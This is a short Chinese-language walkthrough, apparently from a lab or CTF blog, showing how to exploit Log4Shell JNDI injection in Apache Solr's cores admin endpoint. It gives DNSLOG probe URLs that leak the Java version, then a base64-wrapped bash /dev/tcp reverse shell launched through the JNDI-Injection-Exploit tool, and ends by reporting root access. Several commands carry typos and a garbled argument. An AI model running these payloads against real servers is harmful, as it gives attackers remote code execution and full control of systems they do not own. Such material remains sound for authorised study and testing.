访问
DNSLOG平台上获取一个域名来监控我们注入的效果
可以发现 /solr/admin/cores?action= 这里有个参数可以传,可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.8nnw6n.dnslog.cn}
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.8nnw6n.dnslog.cn:9999/aaa}
${jndi:ldap://${sys:java.version}.8nnw6n.dnslog.cn:9999/aaa}
开始反弹ShelI准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下..启动!
# JDNI项目地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
# 反弹shell
bash -i >& /dev/tcp/你的ip/9999 0>&1
# 反弹Shell-base64加密
# 命令模板
java -jar target/INDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C"bash -c{echo,[经过base64编码后的命令]}{base64,-d}|bash"-A 「你的ypsipl
# 备注
-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址,
监听端口
拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址
去另外一个监控终端看看shell有没有弹回来且用 whoami 命令查看权限,发现已经成功获取到root权限了。大功告成!